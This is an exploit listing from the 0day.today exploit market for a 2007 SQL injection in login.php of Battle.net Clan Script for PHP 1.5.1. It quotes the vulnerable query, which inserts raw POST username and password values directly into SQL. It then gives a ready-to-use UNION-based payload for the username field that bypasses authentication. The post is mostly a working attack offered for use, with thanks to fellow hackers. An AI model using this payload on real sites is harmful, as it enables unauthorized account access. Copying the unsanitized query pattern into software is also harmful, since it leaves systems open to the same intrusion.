[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

Author
h a c k e r _ X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1725
Category
web applications
Date add
08-04-2007
Platform
unsorted
=======================================================================
Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability
=======================================================================



****************************************

script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql

auteur : h a c k e r _ X

***************************************

code :
------------------------------------------------------------------------------------------

line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];

.....
.....
.....

line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******

-------------------------------------------------------------------------------------------------


exploit :
*******

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything





************************************************** *
thinks to : max007,simo64,brutalism and all marocains hackers

special thinks for "P Y N S S O"

************************************************** *



#  0day.today [2024-11-16]  #